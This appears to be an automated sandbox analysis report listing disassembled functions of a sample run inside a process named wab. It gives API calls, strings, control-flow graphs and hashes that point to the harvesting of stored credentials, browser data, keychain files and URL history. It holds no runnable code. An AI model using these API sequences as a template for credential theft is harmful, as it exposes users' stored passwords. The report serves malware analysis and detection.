                                                  • LockResource.KERNEL32(00000000), ref: 0040B5DD
                                                  • memcpy.MSVCRT ref: 0040B60D
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3089029097.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: Resource$FindHandleLoadLockModuleSizeofmemcpy
                                                  • String ID: BIN
                                                  • API String ID: 1668488027-1015027815
                                                  • Opcode ID: 6cadd12acd146c90b5568bc01b4485451bf9b169e768bef5838699a2d497f07b
                                                  • Instruction ID: e905eb6dc449d61379ecdc49350c1a2f8866219970738eecada31b95dd052af9
                                                  • Opcode Fuzzy Hash: 6cadd12acd146c90b5568bc01b4485451bf9b169e768bef5838699a2d497f07b
                                                  • Instruction Fuzzy Hash: 5E11C636C00225BBD7116BE2DC09AAFBA78FF85755F010476F81072292DB794D018BED
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • FindFirstFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE67
                                                  • FindNextFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE83
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3089029097.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: FileFind$FirstNext
                                                  • String ID:
                                                  • API String ID: 1690352074-0
                                                  • Opcode ID: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                                  • Instruction ID: bc213c2af839868520f9a45b85e911a0cf9bcc257b6b56acf9ba21b23a9e6198
                                                  • Opcode Fuzzy Hash: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                                  • Instruction Fuzzy Hash: 34F0C877040B005BD761C774D8489C733D89F84320B20063EF56AD32C0EB3899098755
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • memset.MSVCRT ref: 0041898C
                                                  • GetSystemInfo.KERNELBASE(004725C0,?,00000000,004439D6,?,00445FAE,?,?,?,?,?,?), ref: 00418995
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3089029097.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: InfoSystemmemset
                                                  • String ID:
                                                  • API String ID: 3558857096-0
                                                  • Opcode ID: d0407614e71e7ae135e22cefa727abc0102cb379ef2ade91b8070469c4ed11d1
                                                  • Instruction ID: bf8bfd662ffca2911032058da6995c9eeb4a28626cb6ee34ade21af96d3a2c90
                                                  • Opcode Fuzzy Hash: d0407614e71e7ae135e22cefa727abc0102cb379ef2ade91b8070469c4ed11d1
                                                  • Instruction Fuzzy Hash: C0E06531A0163097F22077766C067DF25949F41395F04407BB9049A186EBAC4D8546DE
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 0 44553b-445558 call 44db70 3 445599-4455a2 0->3 4 44555a-44557c call 40c768 call 40bdb0 call 4135f7 0->4 5 4455a8-4455e3 memset call 403988 wcsrchr 3->5 6 4457fb 3->6 39 44558e-445594 call 444b06 4->39 40 44557e-44558c call 4136c0 call 41366b 4->40 16 4455e5 5->16 17 4455e8-4455f9 5->17 10 445800-445809 6->10 13 445856-44585f 10->13 14 44580b-44581e call 40a889 call 403e2d 10->14 19 445861-445874 call 40a889 call 403c9c 13->19 20 4458ac-4458b5 13->20 42 445823-445826 14->42 16->17 24 445672-445683 call 40a889 call 403fbe 17->24 25 4455fb-445601 17->25 50 445879-44587c 19->50 26 44594f-445958 20->26 27 4458bb-44592b memset * 2 call 414c2e call 40b2cc call 409d1f call 409b98 20->27 84 445685 24->84 85 4456b2-4456b5 call 40b1ab 24->85 28 445605-445607 25->28 29 445603 25->29 35 4459f2-4459fa 26->35 36 44595e-4459ce memset * 2 call 414c2e call 40b2cc call 409d1f call 409b98 26->36 135 44592d-445945 call 40b6ef 27->135 136 44594a 27->136 28->24 38 445609-44560d 28->38 29->28 44 445a00-445aa1 memset * 2 call 414c2e call 40b2cc call 409d1f call 40b2cc call 40ae18 35->44 45 445b29-445b32 35->45 153 4459d0-4459e8 call 40b6ef 36->153 154 4459ed 36->154 38->24 48 44560f-445641 call 4087b3 call 40a889 call 4454bf 38->48 39->3 40->39 51 44584c-445854 call 40b1ab 42->51 52 445828 42->52 182 445b08-445b15 call 40ae51 44->182 53 445c7c-445c85 45->53 54 445b38-445b96 memset * 3 45->54 150 445665-445670 call 40b1ab 48->150 151 445643-445663 call 40a9b5 call 4087b3 48->151 64 4458a2-4458aa call 40b1ab 50->64 65 44587e 50->65 51->13 66 44582e-445847 call 40a9b5 call 4087b3 52->66 60 445d1c-445d25 53->60 61 445c8b-445cf3 memset * 2 call 414c2e call 409d1f call 409b98 53->61 67 445bd4-445c72 call 414c2e call 40b2cc call 409d1f call 445389 call 40b2cc call 409d1f call 445389 call 40b2cc call 409d1f call 445389 54->67 68 445b98-445ba0 54->68 73 445fae-445fb2 60->73 74 445d2b-445d3b 60->74 168 445cf5 61->168 169 445cfc-445d03 61->169 64->20 82 445884-44589d call 40a9b5 call 4087b3 65->82 138 445849 66->138 247 445c77 67->247 68->67 83 445ba2-445bcf call 4099c6 call 445403 call 445389 68->83 89 445d3d-445d65 call 409c52 call 40b2cc _wcsicmp 74->89 90 445d88-445e15 memset * 3 call 414c2e call 40b2cc call 409d1f call 409b98 74->90 156 44589f 82->156 83->53 99 44568b-4456a4 call 40a9b5 call 4087b3 84->99 116 4456ba-4456c4 85->116 162 445d67-445d6c 89->162 163 445d71-445d83 call 445093 89->163 196 445e17 90->196 197 445e1e-445e25 90->197 158 4456a9-4456b0 99->158 117 4457f9 116->117 118 4456ca-4456d3 call 413cfa call 413d4c 116->118 117->6 172 4456d8-4456f7 call 40b2cc call 413fa6 118->172 135->136 136->26 138->51 150->116 151->150 153->154 154->35 156->64 158->85 158->99 174 445fa1-445fa9 call 40b6ef 162->174 163->73 168->169 179 445d05-445d13 169->179 180 445d17 169->180 205 4456fd-445796 memset * 4 call 409c70 * 3 172->205 206 4457ea-4457f7 call 413d29 172->206 174->73 179->180 180->60 200 445b17-445b27 call 40aebe 182->200 201 445aa3-445ab0 call 40add4 182->201 196->197 202 445e27-445e59 call 40b2cc call 409d1f call 409b98 197->202 203 445e6b-445e7e call 445093 197->203 200->45 201->182 219 445ab2-445b03 memset call 40b2cc call 409d1f call 445389 201->219 242 445e62-445e69 202->242 243 445e5b 202->243 218 445f67-445f99 call 40b2cc call 409d1f call 409b98 203->218 205->206 246 445798-4457ca call 40b2cc call 409d1f call 409b98 205->246 206->10 218->73 253 445f9b 218->253 219->182 242->203 248 445e83-445ef5 memset call 40b2cc call 409d1f call 40ae18 242->248 243->242 246->206 265 4457cc-4457e5 call 4087b3 246->265 247->53 264 445f4d-445f5a call 40ae51 248->264 253->174 269 445ef7-445f04 call 40add4 264->269 270 445f5c-445f62 call 40aebe 264->270 265->206 269->264 274 445f06-445f38 call 40b2cc call 409d1f call 409b98 269->274 270->218 274->264 281 445f3a-445f48 call 445093 274->281 281->264
                                                  APIs
                                                  • memset.MSVCRT ref: 004455C2
                                                  • wcsrchr.MSVCRT ref: 004455DA
                                                  • memset.MSVCRT ref: 0044570D
                                                  • memset.MSVCRT ref: 00445725
                                                    • Part of subcall function 0040C768: _wcslwr.MSVCRT ref: 0040C817
                                                    • Part of subcall function 0040C768: wcslen.MSVCRT ref: 0040C82C
                                                    • Part of subcall function 0040BDB0: CredEnumerateW.SECHOST(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
                                                    • Part of subcall function 0040BDB0: wcslen.MSVCRT ref: 0040BE06
                                                    • Part of subcall function 0040BDB0: _wcsncoll.MSVCRT ref: 0040BE38
                                                    • Part of subcall function 0040BDB0: memset.MSVCRT ref: 0040BE91
                                                    • Part of subcall function 0040BDB0: memcpy.MSVCRT ref: 0040BEB2
                                                    • Part of subcall function 004135F7: GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
                                                  • memset.MSVCRT ref: 0044573D
                                                  • memset.MSVCRT ref: 00445755
                                                  • memset.MSVCRT ref: 004458CB
                                                  • memset.MSVCRT ref: 004458E3
                                                  • memset.MSVCRT ref: 0044596E
                                                  • memset.MSVCRT ref: 00445A10
                                                  • memset.MSVCRT ref: 00445A28
                                                  • memset.MSVCRT ref: 00445AC6
                                                    • Part of subcall function 00445093: GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                                    • Part of subcall function 00445093: ??2@YAPAXI@Z.MSVCRT ref: 004450BE
                                                    • Part of subcall function 00445093: memset.MSVCRT ref: 004450CD
                                                    • Part of subcall function 00445093: ??3@YAXPAX@Z.MSVCRT ref: 004450F0
                                                    • Part of subcall function 00445093: CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7
                                                  • memset.MSVCRT ref: 00445B52
                                                  • memset.MSVCRT ref: 00445B6A
                                                  • memset.MSVCRT ref: 00445C9B
                                                  • memset.MSVCRT ref: 00445CB3
                                                  • _wcsicmp.MSVCRT ref: 00445D56
                                                  • memset.MSVCRT ref: 00445B82
                                                    • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                                    • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                                    • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                                    • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                                    • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                    • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040ADF3
                                                    • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040AE04
                                                  • memset.MSVCRT ref: 00445986
                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                    • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                    • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                    • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3089029097.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: memset$wcslen$File$wcscmpwcsrchr$??2@??3@AddressAttributesCloseCreateCredEnumerateHandleProcSize_wcsicmp_wcslwr_wcsncollmemcpywcscatwcscpy
                                                  • String ID: *.*$Apple Computer\Preferences\keychain.plist
                                                  • API String ID: 2745753283-3798722523
                                                  • Opcode ID: 60142fc224ce82f33f024026baff3817031bc91c0ca8ee6e0e9eeeaa230f4715
                                                  • Instruction ID: 0d822d17a5609fa1e1b699618fc72e24fb48bc28b5d87ede4d5502c71e25afa2
                                                  • Opcode Fuzzy Hash: 60142fc224ce82f33f024026baff3817031bc91c0ca8ee6e0e9eeeaa230f4715
                                                  • Instruction Fuzzy Hash: ED4278B29005196BEB10E761DD46EDFB37CEF45358F1001ABF508A2193EB385E948B9A
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  APIs
                                                    • Part of subcall function 004044A4: LoadLibraryW.KERNEL32(comctl32.dll), ref: 004044C3
                                                    • Part of subcall function 004044A4: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
                                                    • Part of subcall function 004044A4: FreeLibrary.KERNEL32(00000000), ref: 004044E9
                                                    • Part of subcall function 004044A4: MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                                  • SetErrorMode.KERNELBASE(00008001), ref: 00412799
                                                  • GetModuleHandleW.KERNEL32(00000000,0041493C,00000000), ref: 004127B2
                                                  • EnumResourceTypesW.KERNEL32(00000000), ref: 004127B9
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3089029097.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: Library$AddressEnumErrorFreeHandleLoadMessageModeModuleProcResourceTypes
                                                  • String ID: $/deleteregkey$/savelangfile
                                                  • API String ID: 2744995895-28296030
                                                  • Opcode ID: 72338f9f39f0fed86814d702f01b1d2779e3084bd08ead6f54537fd18a2fe269
                                                  • Instruction ID: bb1d383b9f388563dc7403a66819e695bb2bbb53a4e653fbe84b6d7681309d95
                                                  • Opcode Fuzzy Hash: 72338f9f39f0fed86814d702f01b1d2779e3084bd08ead6f54537fd18a2fe269
                                                  • Instruction Fuzzy Hash: FC51BEB1608346ABD710AFA6DD88A9F77ECFF81304F40092EF644D2161D778E8558B2A
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  APIs
                                                  • memset.MSVCRT ref: 0040B71C
                                                    • Part of subcall function 00409C70: wcscpy.MSVCRT ref: 00409C75
                                                    • Part of subcall function 00409C70: wcsrchr.MSVCRT ref: 00409C7D
                                                  • wcsrchr.MSVCRT ref: 0040B738
                                                  • memset.MSVCRT ref: 0040B756
                                                  • memset.MSVCRT ref: 0040B7F5
                                                  • CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                  • CopyFileW.KERNEL32(00445FAE,?,00000000,?,?), ref: 0040B82D
                                                  • FindCloseChangeNotification.KERNELBASE(00000000,?,?), ref: 0040B838
                                                  • memset.MSVCRT ref: 0040B851
                                                  • memset.MSVCRT ref: 0040B8CA
                                                  • memcmp.MSVCRT ref: 0040B9BF
                                                    • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                    • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                  • DeleteFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0040BAE5
                                                  • memset.MSVCRT ref: 0040BB53
                                                  • memcpy.MSVCRT ref: 0040BB66
                                                  • LocalFree.KERNEL32(00000000,?,?,?,00000000,00000000,?), ref: 0040BB8D
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3089029097.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: memset$File$Freewcsrchr$AddressChangeCloseCopyCreateDeleteFindLibraryLocalNotificationProcmemcmpmemcpywcscpy
                                                  • String ID: chp$v10
                                                  • API String ID: 170802307-2783969131
                                                  • Opcode ID: aa7ff03ddb8a60b54c19e14ecab6b10a2ad5bd81823861da0c4d13f19dc0bdfc
                                                  • Instruction ID: 8b5aa87907ec6e815121f1c024adfc7170cbdef62e19f7af032d1a0a82a34a86
                                                  • Opcode Fuzzy Hash: aa7ff03ddb8a60b54c19e14ecab6b10a2ad5bd81823861da0c4d13f19dc0bdfc
                                                  • Instruction Fuzzy Hash: 32D17372900218AFEB11EB95DC41EEE77B8EF44304F1044BAF509B7191DB789F858B99
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 504 4091b8-40921b memset call 40a6e6 call 444432 509 409520-409526 504->509 510 409221-40923b call 40b273 call 438552 504->510 514 409240-409248 510->514 515 409383-4093ab call 40b273 call 438552 514->515 516 40924e-409258 call 4251c4 514->516 528 4093b1 515->528 529 4094ff-40950b call 443d90 515->529 521 40937b-40937e call 424f26 516->521 522 40925e-409291 call 4253cf * 2 call 4253af * 2 516->522 521->515 522->521 552 409297-409299 522->552 532 4093d3-4093dd call 4251c4 528->532 529->509 538 40950d-409511 529->538 539 4093b3-4093cc call 4253cf * 2 532->539 540 4093df 532->540 538->509 542 409513-40951d call 408f2f 538->542 539->532 555 4093ce-4093d1 539->555 543 4094f7-4094fa call 424f26 540->543 542->509 543->529 552->521 554 40929f-4092a3 552->554 554->521 556 4092a9-4092ba 554->556 555->532 557 4093e4-4093fb call 4253af * 2 555->557 558 4092bc 556->558 559 4092be-4092e3 memcpy memcmp 556->559 557->543 569 409401-409403 557->569 558->559 560 409333-409345 memcmp 559->560 561 4092e5-4092ec 559->561 560->521 564 409347-40935f memcpy 560->564 561->521 563 4092f2-409331 memcpy * 2 561->563 566 409363-409378 memcpy 563->566 564->566 566->521 569->543 570 409409-40941b memcmp 569->570 570->543 571 409421-409433 memcmp 570->571 572 4094a4-4094b6 memcmp 571->572 573 409435-40943c 571->573 572->543 575 4094b8-4094ed memcpy * 2 572->575 573->543 574 409442-4094a2 memcpy * 3 573->574 576 4094f4 574->576 575->576 576->543
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3089029097.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: memcpy$memcmp$ByteCharMultiWidememset
                                                  • String ID:
                                                  • API String ID: 3715365532-3916222277
                                                  • Opcode ID: 84d8fa7e2563b014b86416b64341180d82413736d9254b8658418cb4f91a0b1c
                                                  • Instruction ID: d5c0d9b4f94ac501fd0f2fb5594fd033b2d13f4c98b4255323c8c53c7695c3f7
                                                  • Opcode Fuzzy Hash: 84d8fa7e2563b014b86416b64341180d82413736d9254b8658418cb4f91a0b1c
                                                  • Instruction Fuzzy Hash: DDA1BA71900605ABDB21EF65D885BAFB7BCAF44304F01043FF945E6282EB78EA458B59
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  APIs
                                                    • Part of subcall function 0040DD85: memset.MSVCRT ref: 0040DDAD
                                                    • Part of subcall function 0040DD85: CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                                                    • Part of subcall function 0040DD85: NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                                    • Part of subcall function 0040DD85: FindCloseChangeNotification.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
                                                    • Part of subcall function 0040DD85: GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                                    • Part of subcall function 0040DD85: _wcsicmp.MSVCRT ref: 0040DEB2
                                                    • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                  • OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                                  • GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                                  • DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
                                                  • GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                                    • Part of subcall function 00409A45: GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                                    • Part of subcall function 00409A45: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                    • Part of subcall function 00409A45: GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                                    • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                                  • CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                                  • MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                                  • WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                                  • UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                                  • FindCloseChangeNotification.KERNELBASE(?), ref: 0040E13E
                                                  • CloseHandle.KERNEL32(00000000), ref: 0040E143
                                                  • CloseHandle.KERNEL32(?), ref: 0040E148
                                                  • CloseHandle.KERNEL32(?), ref: 0040E14D
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3089029097.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: File$Close$Handle$CreateProcess$ChangeCurrentFindNotificationTempView$??2@DirectoryDuplicateInformationMappingNameOpenPathQuerySizeSystemUnmapWindowsWrite_wcsicmpmemset
                                                  • String ID: bhv
                                                  • API String ID: 327780389-2689659898
                                                  • Opcode ID: c96677cf1f2b88af9f6f98c954d74ea01aac065ab95576d822b7ccb478d5ef78
                                                  • Instruction ID: 69536691d8562172d0558c987aea6dfe4ed17d6a9a6de0cf2c6621a9a97a0e87
                                                  • Opcode Fuzzy Hash: c96677cf1f2b88af9f6f98c954d74ea01aac065ab95576d822b7ccb478d5ef78
                                                  • Instruction Fuzzy Hash: 15412775800218FBCF119FA6CC489DFBFB9FF09750F148466F504A6250D7748A50CBA8
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 633 413f4f-413f52 634 413fa5 633->634 635 413f54-413f5a call 40a804 633->635 637 413f5f-413fa4 GetProcAddress * 5 635->637 637->634
                                                  APIs
                                                    • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                    • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                    • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                    • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                    • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                    • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                  • GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
                                                  • GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
                                                  • GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
                                                  • GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                                                  • GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3089029097.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                  • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                  • API String ID: 2941347001-70141382
                                                  • Opcode ID: 39c22376907c33733211e363db3c4349312dc982ad78c4cc463d34b505bb12c7
                                                  • Instruction ID: 7b3d606b7d389a8205b465373562f67d85acf78e859b2fe1c5436fc88fb80995
                                                  • Opcode Fuzzy Hash: 39c22376907c33733211e363db3c4349312dc982ad78c4cc463d34b505bb12c7
                                                  • Instruction Fuzzy Hash: BBF03470840340AECB706F769809E06BEF0EFD8B097318C2EE6C557291E3BD9098DE48
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 638 4466f4-44670e call 446904 GetModuleHandleA 641 446710-44671b 638->641 642 44672f-446732 638->642 641->642 643 44671d-446726 641->643 644 44675b-4467aa __set_app_type __p__fmode __p__commode call 4153f2 642->644 646 446747-44674b 643->646 647 446728-44672d 643->647 653 4467ac-4467b7 __setusermatherr 644->653 654 4467b8-44680e call 4468f0 _initterm __wgetmainargs _initterm 644->654 646->642 648 44674d-44674f 646->648 647->642 650 446734-44673b 647->650 652 446755-446758 648->652 650->642 651 44673d-446745 650->651 651->652 652->644 653->654 657 446810-446819 654->657 658 44681e-446825 654->658 659 4468d8-4468dd call 44693d 657->659 660 446827-446832 658->660 661 44686c-446870 658->661 664 446834-446838 660->664 665 44683a-44683e 660->665 662 446845-44684b 661->662 663 446872-446877 661->663 669 446853-446864 GetStartupInfoW 662->669 670 44684d-446851 662->670 663->661 664->660 664->665 665->662 667 446840-446842 665->667 667->662 671 446866-44686a 669->671 672 446879-44687b 669->672 670->667 670->669 673 44687c-446894 GetModuleHandleA call 41276d 671->673 672->673 676 446896-446897 exit 673->676 677 44689d-4468d6 _cexit 673->677 676->677 677->659
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3089029097.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: HandleModule_initterm$InfoStartup__p__commode__p__fmode__set_app_type__setusermatherr__wgetmainargs_cexitexit
                                                  • String ID:
                                                  • API String ID: 2827331108-0
                                                  • Opcode ID: 7ba7b2652c13871cd0d5cae79e0f4a701fe2602556b2c3d333f15f3a91922bbb
                                                  • Instruction ID: 0e3254bf032efe29fc581ce6ca9889a5a3d5d0d8e47fd2ea34fa35870f4f4cb9
                                                  • Opcode Fuzzy Hash: 7ba7b2652c13871cd0d5cae79e0f4a701fe2602556b2c3d333f15f3a91922bbb
                                                  • Instruction Fuzzy Hash: 9D51C474C41314DFEB21AF65D8499AD7BB0FB0A715F21452BE82197291D7788C82CF1E
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  APIs
                                                  • memset.MSVCRT ref: 0040C298
                                                    • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E60F
                                                    • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E629
                                                    • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                  • FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                                  • wcschr.MSVCRT ref: 0040C324
                                                  • wcschr.MSVCRT ref: 0040C344
                                                  • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                                  • GetLastError.KERNEL32 ref: 0040C373
                                                  • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C39F
                                                  • FindCloseUrlCache.WININET(?), ref: 0040C3B0
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3089029097.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: CacheFind$Entrymemset$Nextwcschr$??2@CloseErrorFirstLast
                                                  • String ID: visited:
                                                  • API String ID: 1157525455-1702587658
                                                  • Opcode ID: e6e827466474dba504c602eadc9ccabadb05f86476a5423d269347cfbfdac146
                                                  • Instruction ID: 6629d855392f08d41decd2a192e4b6579142cf3eaa95f33c860a05aa0b18639b
                                                  • Opcode Fuzzy Hash: e6e827466474dba504c602eadc9ccabadb05f86476a5423d269347cfbfdac146
                                                  • Instruction Fuzzy Hash: DA417F71D00219ABDB10EF92DC85AEFBBB8FF45714F10416AE904F7281D7389A45CBA9
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 704 40e175-40e1a1 call 40695d call 406b90 709 40e1a7-40e1e5 memset 704->709 710 40e299-40e2a8 call 4069a3 704->710 712 40e1e8-40e1fa call 406e8f 709->712 716 40e270-40e27d call 406b53 712->716 717 40e1fc-40e219 call 40dd50 * 2 712->717 716->712 722 40e283-40e286 716->722 717->716 728 40e21b-40e21d 717->728 725 40e291-40e294 call 40aa04 722->725 726 40e288-40e290 ??3@YAXPAX@Z 722->726 725->710 726->725 728->716 729 40e21f-40e235 call 40742e 728->729 729->716 732 40e237-40e242 call 40aae3 729->732 732->716 735 40e244-40e26b _snwprintf call 40a8d0 732->735 735->716
                                                  APIs
                                                    • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                                  • memset.MSVCRT ref: 0040E1BD
                                                    • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                                  • ??3@YAXPAX@Z.MSVCRT ref: 0040E28B
                                                    • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
